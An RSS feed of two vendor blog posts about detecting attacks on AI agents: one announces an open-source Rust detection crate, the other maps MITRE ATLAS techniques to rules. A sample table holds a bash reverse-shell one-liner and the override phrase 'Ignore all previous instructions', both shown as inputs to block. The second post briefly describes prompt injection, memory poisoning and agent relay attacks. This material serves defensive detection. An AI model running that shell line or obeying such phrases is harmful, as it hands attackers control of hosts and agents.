<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: AKAVLABS</title>
    <description>The latest articles on Forem by AKAVLABS (@akavlabs).</description>
    <link>https://forem.com/akavlabs</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3854119%2Fbdf97513-1d50-4a34-97f9-58731bf5f0c5.png</url>
      <title>Forem: AKAVLABS</title>
      <link>https://forem.com/akavlabs</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/akavlabs"/>
    <language>en</language>
    <item>
      <title>We open-sourced our AI attack detection engine — 97 MITRE ATLAS rules in a Rust crate</title>
      <dc:creator>AKAVLABS</dc:creator>
      <pubDate>Mon, 13 Apr 2026 10:42:55 +0000</pubDate>
      <link>https://forem.com/akavlabs/we-open-sourced-our-ai-attack-detection-engine-97-mitre-atlas-rules-in-a-rust-crate-522i</link>
      <guid>https://forem.com/akavlabs/we-open-sourced-our-ai-attack-detection-engine-97-mitre-atlas-rules-in-a-rust-crate-522i</guid>
      <description>&lt;p&gt;Today we're publishing &lt;code&gt;atlas-detect&lt;/code&gt; — the detection engine that powers AgentSentry's AI attack prevention — as a standalone open-source Rust crate.&lt;/p&gt;

&lt;p&gt;→ &lt;a href="https://crates.io/crates/atlas-detect" rel="noopener noreferrer"&gt;https://crates.io/crates/atlas-detect&lt;/a&gt;&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;The problem we were solving&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When we started building AgentSentry, we needed to answer one question on every LLM API call: is this request an attack?&lt;/p&gt;

&lt;p&gt;Not a heuristic guess. Not a vibe check. An actual mapping to the MITRE ATLAS framework — the authoritative catalogue of adversarial techniques targeting AI systems.&lt;/p&gt;

&lt;p&gt;MITRE ATLAS has 16 tactics and 111 techniques. We needed to cover as many as possible, in real time, with zero tolerance for false positives on legitimate developer queries.&lt;/p&gt;

&lt;p&gt;Here's what that looks like in practice:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;"Ignore all previous instructions"          → AML.T0036 (Prompt Injection) — BLOCK
"How do I override a method in Python?"     → nothing — ALLOW  
"bash -i &amp;gt;&amp;amp; /dev/tcp/10.0.0.1/4444 0&amp;gt;&amp;amp;1"  → AML.T0057.002 (Reverse Shell) — BLOCK
"Explain how prompt injection works"        → nothing — ALLOW (educational context)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



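&lt;p&gt;The second and fourth lines are where most detectors fail: both are legitimate queries that happen to contain attack-like wording ("override", "prompt injection"). We spent significant time getting these cases right.&lt;/p&gt;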




&lt;p&gt;&lt;strong&gt;How it works&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The engine compiles all 97 detection patterns into a single &lt;code&gt;RegexSet&lt;/code&gt; using Rust's &lt;code&gt;regex&lt;/code&gt; crate. This means every request is scanned against all rules in one pass — not 97 sequential checks.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;use&lt;/span&gt; &lt;span class="nn"&gt;atlas_detect&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;Detector&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;detector&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;Detector&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;hits&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;detector&lt;/span&gt;&lt;span class="nf"&gt;.scan&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Ignore all previous instructions"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;detector&lt;/span&gt;&lt;span class="nf"&gt;.should_block&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;hits&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// hits identifies AML.T0036 here, so reject the request&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The compiled &lt;code&gt;RegexSet&lt;/code&gt; is cached globally via &lt;code&gt;once_cell&lt;/code&gt;, so the compilation cost is paid only once. After the first call, &lt;code&gt;Detector::new()&lt;/code&gt; reuses the cached set and is effectively free. Scan latency on typical LLM prompts is under 1 ms.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;The false positive problem&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Early versions had a 30% false positive rate. Security education queries like "explain how prompt injection works for my course" were getting blocked alongside actual attacks.&lt;/p&gt;

&lt;p&gt;The fix was confidence scoring. When a pattern matches, we compute a confidence score based on:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Base score from severity (Critical = 80, High = 65, Medium = 50...)&lt;/li&gt;
&lt;li&gt;+20 if multiple techniques fire together (coordinated attack signal)&lt;/li&gt;
&lt;li&gt;+20 if this agent has a high historical block rate&lt;/li&gt;
&lt;li&gt;+10 if the message is unusually short (injections tend to be terse)&lt;/li&gt;
&lt;li&gt;-25 if educational/research framing is detected&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After scoring, we filter by a per-severity threshold. A medium-severity hit needs a confidence of 60 to become a block, so a lone medium hit (base score 50) is allowed unless another signal raises it. Critical hits only need 50.&lt;/p&gt;
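
&lt;p&gt;The scoring and threshold rules above can be sketched roughly as follows. This is a minimal illustration, not the crate's actual implementation: the names &lt;code&gt;Severity&lt;/code&gt;, &lt;code&gt;Signals&lt;/code&gt;, &lt;code&gt;confidence&lt;/code&gt; and &lt;code&gt;should_block&lt;/code&gt; are hypothetical, the High threshold of 55 and the clamp to 0..100 are assumptions (only the Medium and Critical thresholds are stated here), and it assumes the adjustments simply add up.&lt;/p&gt;

```rust
// Hypothetical sketch of the confidence scoring described in the post.
// None of these names are taken from the atlas-detect API.

#[derive(Clone, Copy)]
enum Severity {
    Critical,
    High,
    Medium,
}

// Signals that adjust the base score, one flag per bullet in the list.
#[derive(Clone, Copy, Default)]
struct Signals {
    multiple_techniques: bool,
    high_block_history: bool,
    short_message: bool,
    educational_framing: bool,
}

// Base score from severity, as listed in the post.
fn base_score(severity: Severity) -> i32 {
    match severity {
        Severity::Critical => 80,
        Severity::High => 65,
        Severity::Medium => 50,
    }
}

// Minimum confidence required for a hit to become a block.
fn block_threshold(severity: Severity) -> i32 {
    match severity {
        Severity::Critical => 50,
        Severity::High => 55, // assumption: the post does not state this value
        Severity::Medium => 60,
    }
}

// Apply the additive adjustments, then clamp (the clamp is an assumption).
fn confidence(severity: Severity, signals: Signals) -> i32 {
    let mut score = base_score(severity);
    if signals.multiple_techniques {
        score += 20;
    }
    if signals.high_block_history {
        score += 20;
    }
    if signals.short_message {
        score += 10;
    }
    if signals.educational_framing {
        score -= 25;
    }
    score.clamp(0, 100)
}

fn should_block(severity: Severity, signals: Signals) -> bool {
    confidence(severity, signals) >= block_threshold(severity)
}

fn main() {
    let plain = Signals::default();
    let coordinated = Signals { multiple_techniques: true, ..Signals::default() };
    let educational = Signals { educational_framing: true, ..Signals::default() };

    println!("medium, no signals: block = {}", should_block(Severity::Medium, plain));
    println!("medium, coordinated: block = {}", should_block(Severity::Medium, coordinated));
    println!("high, educational: block = {}", should_block(Severity::High, educational));
    println!("critical, educational: block = {}", should_block(Severity::Critical, educational));
}
```

&lt;p&gt;Under these assumptions a lone medium-severity hit scores 50 and is allowed, a medium hit that fires alongside other techniques scores 70 and is blocked, and a critical hit with educational framing still scores 55, which clears its threshold of 50.&lt;/p&gt;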

&lt;p&gt;Result: 0% false positives on a test battery of 20 clean (benign) queries, with the true positive rate held at 100%.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;What it detects&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;97 content-detectable techniques across all 16 MITRE ATLAS tactics:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Prompt injection variants (AML.T0036 and sub-techniques)&lt;/li&gt;
&lt;li&gt;Jailbreaks — DAN, STAN, roleplay framing, authority impersonation&lt;/li&gt;
&lt;li&gt;Credential exfiltration — env var dumps, RAG credential harvesting&lt;/li&gt;
&lt;li&gt;Model extraction — weight theft, system prompt extraction&lt;/li&gt;
&lt;li&gt;RAG poisoning — embedded instructions in document-like content&lt;/li&gt;
&lt;li&gt;Reverse shells and C2 — bash one-liners, PowerShell encoded commands&lt;/li&gt;
&lt;li&gt;Multilingual injections — 20+ languages including Cyrillic homoglyphs&lt;/li&gt;
&lt;li&gt;Base64/obfuscation evasion — decoded and re-scanned&lt;/li&gt;
&lt;li&gt;Deepfake generation requests&lt;/li&gt;
&lt;li&gt;Data destruction commands&lt;/li&gt;
&lt;li&gt;Denial of service patterns&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;14 additional ATLAS techniques require behavioral detection (rate limiting, auth pattern analysis). Content regex can't catch them, and the &lt;code&gt;atlas-detect&lt;/code&gt; docs state this explicitly.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Why open source this&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The detection rules are not our competitive advantage. Anyone determined enough could reconstruct them from the MITRE ATLAS documentation.&lt;/p&gt;

&lt;p&gt;Our advantage is the integrated system: the enforcement gateway, agent discovery, incident correlation, topology mapping, per-agent policy engine, and the platform that ties it all together. That stays closed.&lt;/p&gt;

&lt;p&gt;But the detection engine is genuinely useful to the Rust community — anyone building an LLM proxy, an AI security tool, or just adding safety checks to an AI application. Publishing it creates goodwill, drives inbound interest in AgentSentry, and positions Akav Labs as contributors to the AI security ecosystem rather than just consumers of it.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Using it in your project&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight toml"&gt;&lt;code&gt;&lt;span class="nn"&gt;[dependencies]&lt;/span&gt;
&lt;span class="py"&gt;atlas-detect&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"0.1"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;With serde for JSON serialization:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight toml"&gt;&lt;code&gt;&lt;span class="py"&gt;atlas-detect&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="py"&gt;version&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"0.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="py"&gt;features&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s"&gt;"serde"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;With context for better accuracy:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;use&lt;/span&gt; &lt;span class="nn"&gt;atlas_detect&lt;/span&gt;&lt;span class="p"&gt;::{&lt;/span&gt;&lt;span class="n"&gt;Detector&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ScanContext&lt;/span&gt;&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;detector&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;Detector&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ScanContext&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// user_message, agent_id and get_agent_block_ratio come from your application&lt;/span&gt;
    &lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;user_message&lt;/span&gt;&lt;span class="nf"&gt;.to_string&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
    &lt;span class="n"&gt;agent_block_history&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;get_agent_block_ratio&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;agent_id&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="o"&gt;..&lt;/span&gt;&lt;span class="nn"&gt;Default&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;default&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;hits&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;detector&lt;/span&gt;&lt;span class="nf"&gt;.scan_with_context&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Full documentation at docs.rs/atlas-detect.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;What's next&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;We're working on:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;atlas-detect-async&lt;/code&gt; — async wrapper for Tokio-based applications&lt;/li&gt;
&lt;li&gt;Rule contribution guidelines — the community should be able to add patterns&lt;/li&gt;
&lt;li&gt;OWASP Agentic Top 10 coverage alongside MITRE ATLAS&lt;/li&gt;
&lt;li&gt;Language model-based detection for evasion-resistant techniques&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you're building something with this, we want to know. Open an issue on github.com/akav-labs/atlas-detect or find us at &lt;a href="mailto:security@akav.io"&gt;security@akav.io&lt;/a&gt;.&lt;/p&gt;




&lt;p&gt;Built by Akav Labs — the team behind AgentSentry, the AI agent security platform.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://akav.io" rel="noopener noreferrer"&gt;https://akav.io&lt;/a&gt; | &lt;a href="https://as.akav.io" rel="noopener noreferrer"&gt;https://as.akav.io&lt;/a&gt; | &lt;a href="https://crates.io/crates/atlas-detect" rel="noopener noreferrer"&gt;https://crates.io/crates/atlas-detect&lt;/a&gt;&lt;/p&gt;

</description>
      <category>rust</category>
      <category>security</category>
      <category>llm</category>
      <category>opensource</category>
    </item>
    <item>
      <title>I mapped all 84 MITRE ATLAS techniques to AI agent detection rules — here's what I found</title>
      <dc:creator>AKAVLABS</dc:creator>
      <pubDate>Tue, 31 Mar 2026 19:27:45 +0000</pubDate>
      <link>https://forem.com/akavlabs/i-mapped-all-84-mitre-atlas-techniques-to-ai-agent-detection-rules-heres-what-i-found-1o18</link>
      <guid>https://forem.com/akavlabs/i-mapped-all-84-mitre-atlas-techniques-to-ai-agent-detection-rules-heres-what-i-found-1o18</guid>
      <description>&lt;p&gt;Today Linx Security raised $50M for AI agent identity governance. &lt;br&gt;
It validates the market. But there's a gap nobody is talking about.&lt;/p&gt;

&lt;p&gt;Identity governance tells you what agents are &lt;strong&gt;allowed&lt;/strong&gt; to do.&lt;br&gt;&lt;br&gt;
Runtime security tells you what they're &lt;strong&gt;actually doing&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;MITRE ATLAS documents 84 techniques for attacking AI systems.&lt;br&gt;&lt;br&gt;
Zero commercial products map detection rules to all 84.&lt;/p&gt;

&lt;p&gt;I spent the last several months mapping them. The repo is open source, uses Sigma-compatible YAML, and has live LangChain coverage.&lt;/p&gt;

&lt;p&gt;The 3 most dangerous techniques right now:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;AML.T0054 — Prompt Injection&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Agent reads external content containing malicious instructions.&lt;br&gt;&lt;br&gt;
Executes them because it can't distinguish attacker input from task input.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Memory Poisoning&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
False instructions planted in agent memory activate days later.&lt;br&gt;&lt;br&gt;
The agent's future behavior is controlled by a past attacker.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A2A Relay Attack&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Sub-agent receives instructions from a compromised parent.&lt;br&gt;&lt;br&gt;
No mechanism to verify the instruction chain wasn't hijacked.&lt;/p&gt;

&lt;p&gt;Detection has to happen at inference time — before execution.&lt;br&gt;&lt;br&gt;
Not after the governance layer logs the completed action.&lt;/p&gt;

&lt;p&gt;→ &lt;a href="https://github.com/akav-labs/atlas-agent-rules" rel="noopener noreferrer"&gt;github.com/akav-labs/atlas-agent-rules&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Full writeup on the Linx gap here:&lt;br&gt;&lt;br&gt;
→ &lt;a href="https://open.substack.com/pub/akavlabs/p/linx-just-raised-50m-for-ai-agent" rel="noopener noreferrer"&gt;AgentSentry Research&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>agents</category>
      <category>opensource</category>
    </item>
  </channel>
</rss>
